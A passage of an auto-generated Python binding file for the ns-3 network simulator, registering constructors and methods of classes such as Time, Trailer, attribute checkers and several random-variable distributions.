is_const=True, is_virtual=True) return def register_Ns3Time_methods(root_module, cls): cls.add_binary_numeric_operator('*', root_module['ns3::Time'], root_module['ns3::Time'], param('int64_t const &', u'right')) cls.add_binary_numeric_operator('+', root_module['ns3::Time'], root_module['ns3::Time'], param('ns3::Time const &', u'right')) cls.add_binary_numeric_operator('-', root_module['ns3::Time'], root_module['ns3::Time'], param('ns3::Time const &', u'right')) cls.add_binary_numeric_operator('/', root_module['ns3::Time'], root_module['ns3::Time'], param('int64_t const &', u'right')) cls.add_binary_comparison_operator('<') cls.add_binary_comparison_operator('>') cls.add_binary_comparison_operator('!=') cls.add_inplace_numeric_operator('+=', param('ns3::Time const &', u'right')) cls.add_inplace_numeric_operator('-=', param('ns3::Time const &', u'right')) cls.add_output_stream_operator() cls.add_binary_comparison_operator('<=') cls.add_binary_comparison_operator('==') cls.add_binary_comparison_operator('>=') ## nstime.h (module 'core'): ns3::Time::Time() [constructor] cls.add_constructor([]) ## nstime.h (module 'core'): ns3::Time::Time(ns3::Time const & o) [copy constructor] cls.add_constructor([param('ns3::Time const &', 'o')]) ## nstime.h (module 'core'): ns3::Time::Time(double v) [constructor] cls.add_constructor([param('double', 'v')]) ## nstime.h (module 'core'): ns3::Time::Time(int v) [constructor] cls.add_constructor([param('int', 'v')]) ## nstime.h (module 'core'): ns3::Time::Time(long int v) [constructor] cls.add_constructor([param('long int', 'v')]) ## nstime.h (module 'core'): ns3::Time::Time(long long int v) [constructor] cls.add_constructor([param('long long int', 'v')]) ## nstime.h (module 'core'): ns3::Time::Time(unsigned int v) [constructor] cls.add_constructor([param('unsigned int', 'v')]) ## nstime.h (module 'core'): ns3::Time::Time(long unsigned int v) [constructor] cls.add_constructor([param('long unsigned int', 'v')]) ## nstime.h (module 'core'): ns3::Time::Time(long long unsigned int v) [constructor] cls.add_constructor([param('long long unsigned int', 'v')]) ## nstime.h (module 'core'): ns3::Time::Time(ns3::int64x64_t const & v) [constructor] cls.add_constructor([param('ns3::int64x64_t const &', 'v')]) ## nstime.h (module 'core'): ns3::Time::Time(std::string const & s) [constructor] cls.add_constructor([param('std::string const &', 's')]) ## nstime.h (module 'core'): ns3::TimeWithUnit ns3::Time::As(ns3::Time::Unit const unit) const [member function] cls.add_method('As', 'ns3::TimeWithUnit', [param('ns3::Time::Unit const', 'unit')], is_const=True) ## nstime.h (module 'core'): int ns3::Time::Compare(ns3::Time const & o) const [member function] cls.add_method('Compare', 'int', [param('ns3::Time const &', 'o')], is_const=True) ## nstime.h (module 'core'): static ns3::Time ns3::Time::From(ns3::int64x64_t const & value) [member function] cls.add_method('From', 'ns3::Time', [param('ns3::int64x64_t const &', 'value')], is_static=True) ## nstime.h (module 'core'): static ns3::Time ns3::Time::From(ns3::int64x64_t const & value, ns3::Time::Unit unit) [member function] cls.add_method('From', 'ns3::Time', [param('ns3::int64x64_t const &', 'value'), param('ns3::Time::Unit', 'unit')], is_static=True) ## nstime.h (module 'core'): static ns3::Time ns3::Time::FromDouble(double value, ns3::Time::Unit unit) [member function] cls.add_method('FromDouble', 'ns3::Time', [param('double', 'value'), param('ns3::Time::Unit', 'unit')], is_static=True) ## nstime.h (module 'core'): static ns3::Time ns3::Time::FromInteger(uint64_t value, ns3::Time::Unit unit) [member function] cls.add_method('FromInteger', 'ns3::Time', [param('uint64_t', 'value'), param('ns3::Time::Unit', 'unit')], is_static=True) ## nstime.h (module 'core'): double ns3::Time::GetDays() const [member function] cls.add_method('GetDays', 'double', [], is_const=True) ## nstime.h (module 'core'): double ns3::Time::GetDouble() const [member function] cls.add_method('GetDouble', 'double', [], is_const=True) ## nstime.h (module 'core'): int64_t ns3::Time::GetFemtoSeconds() const [member function] cls.add_method('GetFemtoSeconds', 'int64_t', [], is_const=True) ## nstime.h (module 'core'): double ns3::Time::GetHours() const [member function] cls.add_method('GetHours', 'double', [], is_const=True) ## nstime.h (module 'core'): int64_t ns3::Time::GetInteger() const [member function] cls.add_method('GetInteger', 'int64_t', [], is_const=True) ## nstime.h (module 'core'): int64_t ns3::Time::GetMicroSeconds() const [member function] cls.add_method('GetMicroSeconds', 'int64_t', [], is_const=True) ## nstime.h (module 'core'): int64_t ns3::Time::GetMilliSeconds() const [member function] cls.add_method('GetMilliSeconds', 'int64_t', [], is_const=True) ## nstime.h (module 'core'): double ns3::Time::GetMinutes() const [member function] cls.add_method('GetMinutes', 'double', [], is_const=True) ## nstime.h (module 'core'): int64_t ns3::Time::GetNanoSeconds() const [member function] cls.add_method('GetNanoSeconds', 'int64_t', [], is_const=True) ## nstime.h (module 'core'): int64_t ns3::Time::GetPicoSeconds() const [member function] cls.add_method('GetPicoSeconds', 'int64_t', [], is_const=True) ## nstime.h (module 'core'): static ns3::Time::Unit ns3::Time::GetResolution() [member function] cls.add_method('GetResolution', 'ns3::Time::Unit', [], is_static=True) ## nstime.h (module 'core'): double ns3::Time::GetSeconds() const [member function] cls.add_method('GetSeconds', 'double', [], is_const=True) ## nstime.h (module 'core'): int64_t ns3::Time::GetTimeStep() const [member function] cls.add_method('GetTimeStep', 'int64_t', [], is_const=True) ## nstime.h (module 'core'): double ns3::Time::GetYears() const [member function] cls.add_method('GetYears', 'double', [], is_const=True) ## nstime.h (module 'core'): bool ns3::Time::IsNegative() const [member function] cls.add_method('IsNegative', 'bool', [], is_const=True) ## nstime.h (module 'core'): bool ns3::Time::IsPositive() const [member function] cls.add_method('IsPositive', 'bool', [], is_const=True) ## nstime.h (module 'core'): bool ns3::Time::IsStrictlyNegative() const [member function] cls.add_method('IsStrictlyNegative', 'bool', [], is_const=True) ## nstime.h (module 'core'): bool ns3::Time::IsStrictlyPositive() const [member function] cls.add_method('IsStrictlyPositive', 'bool', [], is_const=True) ## nstime.h (module 'core'): bool ns3::Time::IsZero() const [member function] cls.add_method('IsZero', 'bool', [], is_const=True) ## nstime.h (module 'core'): static ns3::Time ns3::Time::Max() [member function] cls.add_method('Max', 'ns3::Time', [], is_static=True) ## nstime.h (module 'core'): static ns3::Time ns3::Time::Min() [member function] cls.add_method('Min', 'ns3::Time', [], is_static=True) ## nstime.h (module 'core'): static void ns3::Time::SetResolution(ns3::Time::Unit resolution) [member function] cls.add_method('SetResolution', 'void', [param('ns3::Time::Unit', 'resolution')], is_static=True) ## nstime.h (module 'core'): static bool ns3::Time::StaticInit() [member function] cls.add_method('StaticInit', 'bool', [], is_static=True) ## nstime.h (module 'core'): ns3::int64x64_t ns3::Time::To(ns3::Time::Unit unit) const [member function] cls.add_method('To', 'ns3::int64x64_t', [param('ns3::Time::Unit', 'unit')], is_const=True) ## nstime.h (module 'core'): double ns3::Time::ToDouble(ns3::Time::Unit unit) const [member function] cls.add_method('ToDouble', 'double', [param('ns3::Time::Unit', 'unit')], is_const=True) ## nstime.h (module 'core'): int64_t ns3::Time::ToInteger(ns3::Time::Unit unit) const [member function] cls.add_method('ToInteger', 'int64_t', [param('ns3::Time::Unit', 'unit')], is_const=True) return def register_Ns3TraceSourceAccessor_methods(root_module, cls): ## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor::TraceSourceAccessor(ns3::TraceSourceAccessor const & arg0) [copy constructor] cls.add_constructor([param('ns3::TraceSourceAccessor const &', 'arg0')]) ## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor::TraceSourceAccessor() [constructor] cls.add_constructor([]) ## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::Connect(ns3::ObjectBase * obj, std::string context, ns3::CallbackBase const & cb) const [member function] cls.add_method('Connect', 'bool', [param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')], is_pure_virtual=True, is_const=True, is_virtual=True) ## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::ConnectWithoutContext(ns3::ObjectBase * obj, ns3::CallbackBase const & cb) const [member function] cls.add_method('ConnectWithoutContext', 'bool', [param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('ns3::CallbackBase const &', 'cb')], is_pure_virtual=True, is_const=True, is_virtual=True) ## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::Disconnect(ns3::ObjectBase * obj, std::string context, ns3::CallbackBase const & cb) const [member function] cls.add_method('Disconnect', 'bool', [param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')], is_pure_virtual=True, is_const=True, is_virtual=True) ## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::DisconnectWithoutContext(ns3::ObjectBase * obj, ns3::CallbackBase const & cb) const [member function] cls.add_method('DisconnectWithoutContext', 'bool', [param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('ns3::CallbackBase const &', 'cb')], is_pure_virtual=True, is_const=True, is_virtual=True) return def register_Ns3Trailer_methods(root_module, cls): cls.add_output_stream_operator() ## trailer.h (module 'network'): ns3::Trailer::Trailer() [constructor] cls.add_constructor([]) ## trailer.h (module 'network'): ns3::Trailer::Trailer(ns3::Trailer const & arg0) [copy constructor] cls.add_constructor([param('ns3::Trailer const &', 'arg0')]) ## trailer.h (module 'network'): uint32_t ns3::Trailer::Deserialize(ns3::Buffer::Iterator end) [member function] cls.add_method('Deserialize', 'uint32_t', [param('ns3::Buffer::Iterator', 'end')], is_pure_virtual=True, is_virtual=True) ## trailer.h (module 'network'): uint32_t ns3::Trailer::GetSerializedSize() const [member function] cls.add_method('GetSerializedSize', 'uint32_t', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## trailer.h (module 'network'): static ns3::TypeId ns3::Trailer::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## trailer.h (module 'network'): void ns3::Trailer::Print(std::ostream & os) const [member function] cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_pure_virtual=True, is_const=True, is_virtual=True) ## trailer.h (module 'network'): void ns3::Trailer::Serialize(ns3::Buffer::Iterator start) const [member function] cls.add_method('Serialize', 'void', [param('ns3::Buffer::Iterator', 'start')], is_pure_virtual=True, is_const=True, is_virtual=True) return def register_Ns3TriangularRandomVariable_methods(root_module, cls): ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::TriangularRandomVariable::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## random-variable-stream.h (module 'core'): ns3::TriangularRandomVariable::TriangularRandomVariable() [constructor] cls.add_constructor([]) ## random-variable-stream.h (module 'core'): double ns3::TriangularRandomVariable::GetMean() const [member function] cls.add_method('GetMean', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::TriangularRandomVariable::GetMin() const [member function] cls.add_method('GetMin', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::TriangularRandomVariable::GetMax() const [member function] cls.add_method('GetMax', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::TriangularRandomVariable::GetValue(double mean, double min, double max) [member function] cls.add_method('GetValue', 'double', [param('double', 'mean'), param('double', 'min'), param('double', 'max')]) ## random-variable-stream.h (module 'core'): uint32_t ns3::TriangularRandomVariable::GetInteger(uint32_t mean, uint32_t min, uint32_t max) [member function] cls.add_method('GetInteger', 'uint32_t', [param('uint32_t', 'mean'), param('uint32_t', 'min'), param('uint32_t', 'max')]) ## random-variable-stream.h (module 'core'): double ns3::TriangularRandomVariable::GetValue() [member function] cls.add_method('GetValue', 'double', [], is_virtual=True) ## random-variable-stream.h (module 'core'): uint32_t ns3::TriangularRandomVariable::GetInteger() [member function] cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True) return def register_Ns3UniformRandomVariable_methods(root_module, cls): ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::UniformRandomVariable::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## random-variable-stream.h (module 'core'): ns3::UniformRandomVariable::UniformRandomVariable() [constructor] cls.add_constructor([]) ## random-variable-stream.h (module 'core'): double ns3::UniformRandomVariable::GetMin() const [member function] cls.add_method('GetMin', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::UniformRandomVariable::GetMax() const [member function] cls.add_method('GetMax', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::UniformRandomVariable::GetValue(double min, double max) [member function] cls.add_method('GetValue', 'double', [param('double', 'min'), param('double', 'max')]) ## random-variable-stream.h (module 'core'): uint32_t ns3::UniformRandomVariable::GetInteger(uint32_t min, uint32_t max) [member function] cls.add_method('GetInteger', 'uint32_t', [param('uint32_t', 'min'), param('uint32_t', 'max')]) ## random-variable-stream.h (module 'core'): double ns3::UniformRandomVariable::GetValue() [member function] cls.add_method('GetValue', 'double', [], is_virtual=True) ## random-variable-stream.h (module 'core'): uint32_t ns3::UniformRandomVariable::GetInteger() [member function] cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True) return def register_Ns3WeibullRandomVariable_methods(root_module, cls): ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::WeibullRandomVariable::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## random-variable-stream.h (module 'core'): ns3::WeibullRandomVariable::WeibullRandomVariable() [constructor] cls.add_constructor([]) ## random-variable-stream.h (module 'core'): double ns3::WeibullRandomVariable::GetScale() const [member function] cls.add_method('GetScale', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::WeibullRandomVariable::GetShape() const [member function] cls.add_method('GetShape', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::WeibullRandomVariable::GetBound() const [member function] cls.add_method('GetBound', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::WeibullRandomVariable::GetValue(double scale, double shape, double bound) [member function] cls.add_method('GetValue', 'double', [param('double', 'scale'), param('double', 'shape'), param('double', 'bound')]) ## random-variable-stream.h (module 'core'): uint32_t ns3::WeibullRandomVariable::GetInteger(uint32_t scale, uint32_t shape, uint32_t bound) [member function] cls.add_method('GetInteger', 'uint32_t', [param('uint32_t', 'scale'), param('uint32_t', 'shape'), param('uint32_t', 'bound')]) ## random-variable-stream.h (module 'core'): double ns3::WeibullRandomVariable::GetValue() [member function] cls.add_method('GetValue', 'double', [], is_virtual=True) ## random-variable-stream.h (module 'core'): uint32_t ns3::WeibullRandomVariable::GetInteger() [member function] cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True) return def register_Ns3ZetaRandomVariable_methods(root_module, cls): ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::ZetaRandomVariable::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## random-variable-stream.h (module 'core'): ns3::ZetaRandomVariable::ZetaRandomVariable() [constructor] cls.add_constructor([]) ## random-variable-stream.h (module 'core'): double ns3::ZetaRandomVariable::GetAlpha() const [member function] cls.add_method('GetAlpha', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::ZetaRandomVariable::GetValue(double alpha) [member function] cls.add_method('GetValue', 'double', [param('double', 'alpha')]) ## random-variable-stream.h (module 'core'): uint32_t ns3::ZetaRandomVariable::GetInteger(uint32_t alpha) [member function] cls.add_method('GetInteger', 'uint32_t', [param('uint32_t', 'alpha')]) ## random-variable-stream.h (module 'core'): double ns3::ZetaRandomVariable::GetValue() [member function] cls.add_method('GetValue', 'double', [], is_virtual=True) ## random-variable-stream.h (module 'core'): uint32_t ns3::ZetaRandomVariable::GetInteger() [member function] cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True) return def register_Ns3ZipfRandomVariable_methods(root_module, cls): ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::ZipfRandomVariable::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## random-variable-stream.h (module 'core'): ns3::ZipfRandomVariable::ZipfRandomVariable() [constructor] cls.add_constructor([]) ## random-variable-stream.h (module 'core'): uint32_t ns3::ZipfRandomVariable::GetN() const [member function] cls.add_method('GetN', 'uint32_t', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::ZipfRandomVariable::GetAlpha() const [member function] cls.add_method('GetAlpha', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::ZipfRandomVariable::GetValue(uint32_t n, double alpha) [member function] cls.add_method('GetValue', 'double', [param('uint32_t', 'n'), param('double', 'alpha')]) ## random-variable-stream.h (module 'core'): uint32_t ns3::ZipfRandomVariable::GetInteger(uint32_t n, uint32_t alpha) [member function] cls.add_method('GetInteger', 'uint32_t', [param('uint32_t', 'n'), param('uint32_t', 'alpha')]) ## random-variable-stream.h (module 'core'): double ns3::ZipfRandomVariable::GetValue() [member function] cls.add_method('GetValue', 'double', [], is_virtual=True) ## random-variable-stream.h (module 'core'): uint32_t ns3::ZipfRandomVariable::GetInteger() [member function] cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True) return def register_Ns3AttributeAccessor_methods(root_module, cls): ## attribute.h (module 'core'): ns3::AttributeAccessor::AttributeAccessor(ns3::AttributeAccessor const & arg0) [copy constructor] cls.add_constructor([param('ns3::AttributeAccessor const &', 'arg0')]) ## attribute.h (module 'core'): ns3::AttributeAccessor::AttributeAccessor() [constructor] cls.add_constructor([]) ## attribute.h (module 'core'): bool ns3::AttributeAccessor::Get(ns3::ObjectBase const * object, ns3::AttributeValue & attribute) const [member function] cls.add_method('Get', 'bool', [param('ns3::ObjectBase const *', 'object'), param('ns3::AttributeValue &', 'attribute')], is_pure_virtual=True, is_const=True, is_virtual=True) ## attribute.h (module 'core'): bool ns3::AttributeAccessor::HasGetter() const [member function] cls.add_method('HasGetter', 'bool', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## attribute.h (module 'core'): bool ns3::AttributeAccessor::HasSetter() const [member function] cls.add_method('HasSetter', 'bool', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## attribute.h (module 'core'): bool ns3::AttributeAccessor::Set(ns3::ObjectBase * object, ns3::AttributeValue const & value) const [member function] cls.add_method('Set', 'bool', [param('ns3::ObjectBase *', 'object', transfer_ownership=False), param('ns3::AttributeValue const &', 'value')], is_pure_virtual=True, is_const=True, is_virtual=True) return def register_Ns3AttributeChecker_methods(root_module, cls): ## attribute.h (module 'core'): ns3::AttributeChecker::AttributeChecker(ns3::AttributeChecker const & arg0) [copy constructor] cls.add_constructor([param('ns3::AttributeChecker const &', 'arg0')]) ## attribute.h (module 'core'): ns3::AttributeChecker::AttributeChecker() [constructor] cls.add_constructor([]) ## attribute.h (module 'core'): bool ns3::AttributeChecker::Check(ns3::AttributeValue const & value) const [member function] cls.add_method('Check', 'bool', [param('ns3::AttributeValue const &', 'value')], is_pure_virtual=True, is_const=True, is_virtual=True) ## attribute.h (module 'core'): bool ns3::AttributeChecker::Copy(ns3::AttributeValue const & source, ns3::AttributeValue & destination) const [member function] cls.add_method('Copy', 'bool', [param('ns3::AttributeValue const &', 'source'), param('ns3::AttributeValue &', 'destination')], is_pure_virtual=True, is_const=True, is_virtual=True) ## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeChecker::Create() const [member function] cls.add_method('Create', 'ns3::Ptr< ns3::AttributeValue >', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeChecker::CreateValidValue(ns3::AttributeValue const & value) const [member function] cls.add_method('CreateValidValue', 'ns3::Ptr< ns3::AttributeValue >', [param('ns3::AttributeValue const &', 'value')], is_const=True) ## attribute.h (module 'core'): std::string ns3::AttributeChecker::GetUnderlyingTypeInformation() const [member function] cls.add_method('GetUnderlyingTypeInformation', 'std::string', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## attribute.h (module 'core'): std::string ns3::AttributeChecker::GetValueTypeName() const [member function] cls.add_method('GetValueTypeName', 'std::string', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## attribute.h (module 'core'): bool ns3::AttributeChecker::HasUnderlyingTypeInformation() const [member function] cls.add_method('HasUnderlyingTypeInformation', 'bool', [], is_pure_virtual=True, is_const=True, is_virtual=True) return def register_Ns3AttributeValue_methods(root_module, cls): ## attribute.h (module 'core'): ns3::AttributeValue::AttributeValue(ns3::AttributeValue const & arg0) [copy constructor] cls.add_constructor([param('ns3::AttributeValue const &', 'arg0')]) ## attribute.h (module 'core'): ns3::AttributeValue::AttributeValue() [constructor] cls.add_constructor([]) ## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeValue::Copy() const [member function] cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## attribute.h (module 'core'): bool ns3::AttributeValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function] cls.add_method('DeserializeFromString', 'bool', [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_pure_virtual=True, is_virtual=True) ## attribute.h (module 'core'): std::string ns3::AttributeValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function] cls.add_method('SerializeToString', 'std::string', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_pure_virtual=True, is_const=True, is_virtual=True) return def register_Ns3CallbackChecker_methods(root_module, cls): ## callback.h (module 'core'): ns3::CallbackChecker::CallbackChecker() [constructor] cls.add_constructor([]) ## callback.h (module 'core'): ns3::CallbackChecker::CallbackChecker(ns3::CallbackChecker const & arg0) [copy constructor] cls.add_constructor([param('ns3::CallbackChecker const &', 'arg0')]) return def register_Ns3CallbackImplBase_methods(root_module, cls): ## callback.h (module 'core'): ns3::CallbackImplBase::CallbackImplBase() [constructor] cls.add_constructor([]) ## callback.h (module 'core'): ns3::CallbackImplBase::CallbackImplBase(ns3::CallbackImplBase const & arg0) [copy constructor] cls.add_constructor([param('ns3::CallbackImplBase const &', 'arg0')]) ## callback.h (module 'core'): std::string ns3::CallbackImplBase::GetTypeid() const [member function] cls.add_method('GetTypeid', 'std::string', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## callback.h (module 'core'): bool ns3::CallbackImplBase::IsEqual(ns3::Ptr<ns3::CallbackImplBase const> other) const [member function] cls.add_method('IsEqual', 'bool', [param('ns3::Ptr< ns3::CallbackImplBase const >', 'other')], is_pure_virtual=True, is_const=True, is_virtual=True) ## callback.h (module 'core'): static std::string ns3::CallbackImplBase::Demangle(std::string const & mangled) [member function] cls.add_method('Demangle', 'std::string', [param('std::string const &', 'mangled')], is_static=True, visibility='protected') return def register_Ns3CallbackValue_methods(root_module, cls): ## callback.h (module 'core'): ns3::CallbackValue::CallbackValue(ns3::CallbackValue const & arg0) [copy constructor] cls.add_constructor([param('ns3::CallbackValue const &', 'arg0')]) ## callback.h (module 'core'): ns3::CallbackValue::CallbackValue() [constructor] cls.add_constructor([]) ## callback.h (module 'core'): ns3::CallbackValue::CallbackValue(ns3::CallbackBase const & base) [constructor] cls.add_constructor([param('ns3::CallbackBase const &', 'base')]) ## callback.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::CallbackValue::Copy() const [member function] cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, is_virtual=True) ## callback.h (module 'core'): bool ns3::CallbackValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function] cls.add_method('DeserializeFromString', 'bool', [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_virtual=True) ## callback.h (module 'core'): std::string ns3::CallbackValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function] cls.add_method('SerializeToString', 'std::string', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_const=True, is_virtual=True) ## callback.h (module 'core'): void ns3::CallbackValue::Set(ns3::CallbackBase base) [member function] cls.add_method('Set', 'void', [param('ns3::CallbackBase', 'base')]) return def register_Ns3ConstantRandomVariable_methods(root_module, cls): ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::ConstantRandomVariable::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## random-variable-stream.h (module 'core'): ns3::ConstantRandomVariable::ConstantRandomVariable() [constructor] cls.add_constructor([]) ## random-variable-stream.h (module 'core'): double ns3::ConstantRandomVariable::GetConstant() const [member function] cls.add_method('GetConstant', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::ConstantRandomVariable::GetValue(double constant) [member function] cls.add_method('GetValue', 'double', [param('double', 'constant')]) ## random-variable-stream.h (module 'core'): uint32_t ns3::ConstantRandomVariable::GetInteger(uint32_t constant) [member function] cls.add_method('GetInteger', 'uint32_t', [param('uint32_t', 'constant')]) ## random-variable-stream.h (module 'core'): double ns3::ConstantRandomVariable::GetValue() [member function] cls.add_method('GetValue', 'double', [], is_virtual=True) ## random-variable-stream.h (module 'core'): uint32_t ns3::ConstantRandomVariable::GetInteger() [member function] cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True) return def register_Ns3DeterministicRandomVariable_methods(root_module, cls): ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::DeterministicRandomVariable::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## random-variable-stream.h (module 'core'): ns3::DeterministicRandomVariable::DeterministicRandomVariable() [constructor] cls.add_constructor([]) ## random-variable-stream.h (module 'core'): void ns3::DeterministicRandomVariable::SetValueArray(double * values, uint64_t length) [member function] cls.add_method('SetValueArray', 'void', [param('double *', 'values'), param('uint64_t', 'length')]) ## random-variable-stream.h (module 'core'): double ns3::DeterministicRandomVariable::GetValue() [member function] cls.add_method('GetValue', 'double', [], is_virtual=True) ## random-variable-stream.h (module 'core'): uint32_t ns3::DeterministicRandomVariable::GetInteger() [member function] cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True) return def register_Ns3EmpiricalRandomVariable_methods(root_module, cls): ## random-variable-stream.h (module 'core'): ns3::EmpiricalRandomVariable::EmpiricalRandomVariable() [constructor] cls.add_constructor([]) ## random-variable-stream.h (module 'core'): void ns3::EmpiricalRandomVariable::CDF(double v, double c) [member function] cls.add_method('CDF', 'void', [param('double', 'v'), param('double', 'c')]) ## random-variable-stream.h (module 'core'): uint32_t ns3::EmpiricalRandomVariable::GetInteger() [member function] cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True) ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::EmpiricalRandomVariable::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## random-variable-stream.h (module 'core'): double ns3::EmpiricalRandomVariable::GetValue() [member function] cls.add_method('GetValue', 'double', [], is_virtual=True) ## random-variable-stream.h (module 'core'): double ns3::EmpiricalRandomVariable::Interpolate(double c1, double c2, double v1, double v2, double r) [member function] cls.add_method('Interpolate', 'double', [param('double', 'c1'), param('double', 'c2'), param('double', 'v1'), param('double', 'v2'), param('double', 'r')], visibility='private', is_virtual=True) ## random-variable-stream.h (module 'core'): void ns3::EmpiricalRandomVariable::Validate() [member function] cls.add_method('Validate', 'void', [], visibility='private', is_virtual=True) return def register_Ns3EmptyAttributeAccessor_methods(root_module, cls): ## attribute.h (module 'core'): ns3::EmptyAttributeAccessor::EmptyAttributeAccessor(ns3::EmptyAttributeAccessor const & arg0) [copy constructor] cls.add_constructor([param('ns3::EmptyAttributeAccessor const &', 'arg0')]) ## attribute.h (module 'core'): ns3::EmptyAttributeAccessor::EmptyAttributeAccessor() [constructor] cls.add_constructor([]) ## attribute.h (module 'core'): bool ns3::EmptyAttributeAccessor::Get(ns3::ObjectBase const * object, ns3::AttributeValue & attribute) const [member function] cls.add_method('Get', 'bool', [param('ns3::ObjectBase const *', 'object'), param('ns3::AttributeValue &', 'attribute')], is_const=True, is_virtual=True) ## attribute.h (module 'core'): bool ns3::EmptyAttributeAccessor::HasGetter() const [member function] cls.add_method('HasGetter', 'bool', [], is_const=True, is_virtual=True) ## attribute.h (module 'core'): bool ns3::EmptyAttributeAccessor::HasSetter() const [member function] cls.add_method('HasSetter', 'bool', [], is_const=True, is_virtual=True) ## attribute.h (module 'core'): bool ns3::EmptyAttributeAccessor::Set(ns3::ObjectBase * object, ns3::AttributeValue const & value) const [member function] cls.add_method('Set', 'bool', [param('ns3::ObjectBase *', 'object'), param('ns3::AttributeValue const &', 'value')], is_const=True, is_virtual=True) return def register_Ns3EmptyAttributeChecker_methods(root_module, cls): ## attribute.h (module 'core'): ns3::EmptyAttributeChecker::EmptyAttributeChecker(ns3::EmptyAttributeChecker const & arg0) [copy constructor] cls.add_constructor([param('ns3::EmptyAttributeChecker const &', 'arg0')]) ## attribute.h (module 'core'): ns3::EmptyAttributeChecker::EmptyAttributeChecker() [constructor] cls.add_constructor([]) ## attribute.h (module 'core'): bool ns3::EmptyAttributeChecker::Check(ns3::AttributeValue const & value) const [member function] cls.add_method('Check', 'bool', [param('ns3::AttributeValue const &', 'value')], is_const=True, is_virtual=True) ## attribute.h (module 'core'): bool ns3::EmptyAttributeChecker::Copy(ns3::AttributeValue const & source, ns3::AttributeValue & destination) const [member function] cls.add_method('Copy', 'bool', [param('ns3::AttributeValue const &', 'source'), param('ns3::AttributeValue &', 'destination')], is_const=True, is_virtual=True) ## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::EmptyAttributeChecker::Create() const [member function] cls.add_method('Create', 'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, is_virtual=True) ## attribute.h (module 'core'): std::string ns3::EmptyAttributeChecker::GetUnderlyingTypeInformation() const [member function] cls.add_method('GetUnderlyingTypeInformation', 'std::string', [], is_const=True, is_virtual=True) ## attribute.h (module 'core'): std::string ns3::EmptyAttributeChecker::GetValueTypeName() const [member function] 